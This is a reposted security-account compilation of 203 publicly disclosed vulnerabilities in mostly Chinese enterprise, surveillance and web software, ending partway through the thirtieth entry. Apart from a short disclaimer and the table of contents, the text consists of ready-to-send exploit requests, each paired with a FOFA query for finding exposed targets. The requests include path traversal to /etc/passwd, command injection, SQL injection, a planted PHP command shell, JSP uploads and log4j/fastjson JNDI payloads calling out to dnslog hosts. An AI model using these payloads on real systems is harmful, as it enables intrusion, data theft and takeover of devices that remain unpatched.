Compilation of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive exercises; we hope this article helps with your defense. Defenders can use its contents to check their own exposure.

Sources: The article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: All of these vulnerabilities are public; contact the product vendor for patches or remediation guidance.

Content: Due to length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: If the content infringes any party's legitimate rights, contact the 网络安全新视界 team via the backend to have the relevant content removed.

Statement

To simplify things and make browsing easier, there is no "reply to get the full list". This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).
Table of Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor system static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus mobile service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operations management center session command execution
93. Qi An Xin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin (奇安信) 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS ocean video management system dmku SQL injection
201. 方正 full-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC List

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor system static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: executes the function, with the command base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua (大华) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua (大华) ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua (大华) ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua (大华) ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua (大华) ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
